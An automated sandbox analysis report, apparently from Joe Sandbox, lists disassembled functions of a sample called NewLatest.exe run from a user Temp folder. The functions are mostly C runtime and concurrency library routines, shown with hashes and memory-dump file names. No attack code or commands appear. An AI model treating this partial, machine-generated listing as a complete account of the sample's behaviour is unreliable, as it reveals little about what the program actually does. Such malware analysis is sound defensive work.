Instruction ID: 34abff83a2f2fb9e48b2e90958eba148d579791e85055058eb1f81d3248f39e3
Opcode Fuzzy Hash: 6e4554985036582841ba5059986901691cd6e61d5b0cf65bf5a53065cc6a1827
Instruction Fuzzy Hash: 3331C335B00214FBCF05EF68C881DAE73B9AF58310F254469E951A72D2EBB4EE158B90

Function 000FE6BF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 000FE6E7

Part of subcall function 000FE454: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 000FE487
Part of subcall function 000FE454: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 000FE4A9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 000FE764
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 000FE770
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 000FE77F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 000FE789
Concurrency::location::_Assign.LIBCMT ref: 000FE7BD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 000FE7C5

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: a69bc620994bd63f8b3df4f4398c36da6cb468914e808d5a8fb4741699557d44
Instruction ID: 1d4b8e833e4bba0ae1f6affbe42741485a792bf8d7d90e3b8a60e984eb911a1f
Opcode Fuzzy Hash: a69bc620994bd63f8b3df4f4398c36da6cb468914e808d5a8fb4741699557d44
Instruction Fuzzy Hash: 86412935A00249DFCF05EF64C494AADB7B5FF48300F1580AADE49AB792DB34A941DF91

Function 0010EF7B Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0010EF43: _free.LIBCMT ref: 0010EF68

_free.LIBCMT ref: 0010EFC9

Part of subcall function 0010AC95: HeapFree.KERNEL32(00000000,00000000,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?), ref: 0010ACAB
Part of subcall function 0010AC95: GetLastError.KERNEL32(?,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?,?), ref: 0010ACBD

_free.LIBCMT ref: 0010EFD4
_free.LIBCMT ref: 0010EFDF
_free.LIBCMT ref: 0010F033
_free.LIBCMT ref: 0010F03E
_free.LIBCMT ref: 0010F049
_free.LIBCMT ref: 0010F054

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: d97ed568de1a0934b695832e79e1dad51cc1863af95f582c64564e3d75521a42
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: 2E1121B1541B48AAE932B7B1CD0BFCBB7DC5F14700F884C55B2DEAA0D2EBB5B6044651

Function 000E6C40 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 000EC5AF: mtx_do_lock.LIBCPMT ref: 000EC5B7

__Mtx_unlock.LIBCPMT ref: 000E6D11
std::_Rethrow_future_exception.LIBCPMT ref: 000E6D62
std::_Rethrow_future_exception.LIBCPMT ref: 000E6D72
__Mtx_unlock.LIBCPMT ref: 000E6E15
__Mtx_unlock.LIBCPMT ref: 000E6F1B
__Mtx_unlock.LIBCPMT ref: 000E6F56

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 34fc2fd8005464a955ef5c5ee87e89ea70b20724dedc509b4c597dfbb60692dc
Instruction ID: b381c5a3b68ef668cae05d716ada5ea10372347109c6effaa3171caaaafafba1
Opcode Fuzzy Hash: 34fc2fd8005464a955ef5c5ee87e89ea70b20724dedc509b4c597dfbb60692dc
Instruction Fuzzy Hash: AFC11271D003889FDB24DF66E805BAFBBF4AF11340F00456EE816B7682DB32A904CB61

Function 0010FB5F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,000D86B0,00000000), ref: 0010FBA7
__fassign.LIBCMT ref: 0010FD86
__fassign.LIBCMT ref: 0010FDA3
WriteFile.KERNEL32(?,000D86B0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010FDEB
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0010FE2B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010FED7

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 4b59f6bfd5e1891772f1ffec83e6bfe0c1486c1567501b3e8889b43c1380db7c
Instruction ID: 723c80b7496501d0aa248157936975d7ee2367542c3453f2ec5b7a894449361a
Opcode Fuzzy Hash: 4b59f6bfd5e1891772f1ffec83e6bfe0c1486c1567501b3e8889b43c1380db7c
Instruction Fuzzy Hash: E6D1BA71D002489FDB25CFE8D8819EDBBB5BF48310F29016EE895BB692D770A946CB50

Function 000FE7ED Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 000FE82E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 000FE836
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 000FE860
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 000FE869
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 000FE8EC
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 000FE8F4

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 3dba1d9f73b0cea2457e013779bff0d5e874a9224f7bc0f199cd4b4253a71229
Instruction ID: 45f7fdc927f123b76c3b0ed0413ab144cc343121006a26256c7560888fd409aa
Opcode Fuzzy Hash: 3dba1d9f73b0cea2457e013779bff0d5e874a9224f7bc0f199cd4b4253a71229
Instruction Fuzzy Hash: 17416075A00119EFCB09EF64C454ABDB7B6FF88310F108159E906A77A1CB74AE11DF81

Function 000EEBF6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 000EEBFD
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 000EEC27

Part of subcall function 000EF2ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 000EF30A

__alloca_probe_16.LIBCMT ref: 000EEC63
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 000EECA4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 000EECD6
__freea.LIBCMT ref: 000EECFC

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 7558e4cb7a29da757f42112c13bc084332f230699107f17f51a55c64259b92b7
Instruction ID: 5622e94a20f8db809b718e8565d7e255954c4fa088706a2db7ba90124a43a64b
Opcode Fuzzy Hash: 7558e4cb7a29da757f42112c13bc084332f230699107f17f51a55c64259b92b7
Instruction Fuzzy Hash: 95317E71E0019A8FDB19DFA9CA415ADB7F5AF48310F75406AE405F7341DB34AE02CBA5

Function 000EED6F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 000EEDCC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 000EEDD8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 000EEDF1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 000EEE1F
Concurrency::Context::Block.LIBCONCRT ref: 000EEE41

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 78c7cfbb84cc5bf2dd8fc91980362fd3922a8e35234420cc70443d94dea0fc0d
Instruction ID: d37afb39fb568538240f3cf00c97ab5e6f8fda4ea08c739bb7daf7998bb8821c
Opcode Fuzzy Hash: 78c7cfbb84cc5bf2dd8fc91980362fd3922a8e35234420cc70443d94dea0fc0d
Instruction Fuzzy Hash: 75216D708042CECEDF64DFA5D9456EEB7F0BF14310F24062AE165B62D2EBB14A84CB90

Function 000F9F36 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 000F9F79

Part of subcall function 000FB470: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 000FB4BF

GetCurrentThread.KERNEL32 ref: 000F9F83
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 000F9F8F

Part of subcall function 000F0298: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 000F02AA

Part of subcall function 000F0724: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 000F072B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 000F9FD2

Part of subcall function 000FB422: SetEvent.KERNEL32(?,?,000F9FD7,000FAD6B,00000000,?,00000000,000FAD6B,00000004,000FB417,?,00000000,?,?,00000000), ref: 000FB466

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 000F9FDB

Part of subcall function 000FAA51: List.LIBCONCRT ref: 000FAA87

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 000F9FEB

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 9ec5ff3f52dbd121fe132fa7e970fd8a42c60e555a9049324a97117d5a36567d
Instruction ID: f5a4a327a8e558120331b998fdec84d1c251d60fa2a4160c700bf236274bb204
Opcode Fuzzy Hash: 9ec5ff3f52dbd121fe132fa7e970fd8a42c60e555a9049324a97117d5a36567d
Instruction Fuzzy Hash: 9F219D356007189FCB25EF65D9908BAB3F5FF48300700465DE646A7A62CB34F909DBA1

Function 00104E47 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00104E3E,001039FF,000EB455,E20BEACA,?,00000000,0011B248,000000FF,?,000D232A,?,?), ref: 00104E55
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00104E63
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00104E7C
SetLastError.KERNEL32(00000000,?,00104E3E,001039FF,000EB455,E20BEACA,?,00000000,0011B248,000000FF,?,000D232A,?,?), ref: 00104ECE

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: dafb9242b09b7a7f064272ab987943accbcb2db588e517f6669d4b751eb02ea2
Instruction ID: 86fb72de5809df9867bfc65ee69d6d3eb77ec1b19cbb8951190aa93c48073dbb
Opcode Fuzzy Hash: dafb9242b09b7a7f064272ab987943accbcb2db588e517f6669d4b751eb02ea2
Instruction Fuzzy Hash: DF01D8723082116FE6392B74ECC5A272645FB15774730032AF6A4818F1EFE64C569584

Function 000EFB2B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 000EFB39
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 000EFB3F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 000EFB6C
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 000EFB76
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 000EFB88
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 000EFB9E

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 37d14e758835a69f7f1f525d9157820a6f171ec30cc92eda3c5598dca7ec0054
Instruction ID: dca6052060e8fa4334e90c7d411ac017d73259d3ab45520ad6e5bc8c48fddeea
Opcode Fuzzy Hash: 37d14e758835a69f7f1f525d9157820a6f171ec30cc92eda3c5598dca7ec0054
Instruction Fuzzy Hash: 5901F731600156BFDB25AB62EC59EBF37ACEF843A1B100535F541F2462EB60D9518764

Function 000DDAC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

list too long, xrefs: 000DDF7D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: c66a7d9540f29c9ef2065d4ecf452e146300014f3fd714259cd23f23bb92678b
Instruction ID: db0f34731c6cb2d99d9ba73d36942d9794935a457a3937db5548bd2abfbbd367
Opcode Fuzzy Hash: c66a7d9540f29c9ef2065d4ecf452e146300014f3fd714259cd23f23bb92678b
Instruction Fuzzy Hash: 9051B771D04758ABDB10EB65CC45FDAB3F8EF04710F0042AAF808A7682E771AA91CB51

Function 00104D2A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00104D7D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00104D96
PMDtoOffset.LIBCMT ref: 00104DBC

Strings

Bad dynamic_cast!, xrefs: 00104DFE

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 91e47494dc694a1ee3baf8f458fe027afcd4d326eca7d8c8e372a11d501f727e
Instruction ID: 45c744d2c255a713972bfbcf63cc191b3cea3cfaf455f6a81125f09d79448cae
Opcode Fuzzy Hash: 91e47494dc694a1ee3baf8f458fe027afcd4d326eca7d8c8e372a11d501f727e
Instruction Fuzzy Hash: EF21DEB2604215AFDF14DFA4DD86EAD77B9EB64720F108119FA50976C0D7B0E9108790

Function 00101737 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00101792
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001017B1
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 001017F8

Strings

pContext, xrefs: 001017A9

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: 1ea9c306fdcfce282253787c85e31d20c5c325629e06683d1e571e252dac5574
Instruction ID: 77bfd7782fdd2a83adb9663c5ff927a5e337cb949032be2fb2c919bc1134631a
Opcode Fuzzy Hash: 1ea9c306fdcfce282253787c85e31d20c5c325629e06683d1e571e252dac5574
Instruction Fuzzy Hash: 55212B35700615BFCB19EB68D895ABEB3A9BF94334B04012AF551872D2CFF8EC518B91

Function 0010DE83 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, xrefs: 0010DE88

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
API String ID: 0-3661964722
Opcode ID: 1899a34a51510f051cc84dc59848cf8fc3ba45f4a9a44260f8f77777a719ea94
Instruction ID: f44ee5634081b61557dd0b3bee7bbebd9aebe74aba158a8a103c9863a74bf81a
Opcode Fuzzy Hash: 1899a34a51510f051cc84dc59848cf8fc3ba45f4a9a44260f8f77777a719ea94
Instruction Fuzzy Hash: BF21C67160810ABFEB20AFA1ECC1D6B77ADEF503647108514F9A5D71D1EBB0EC5187A0

Function 001070A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 001070EB

Strings

.bat, xrefs: 0010711A
.com, xrefs: 0010712B
.cmd, xrefs: 00107109
.exe, xrefs: 001070F8

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
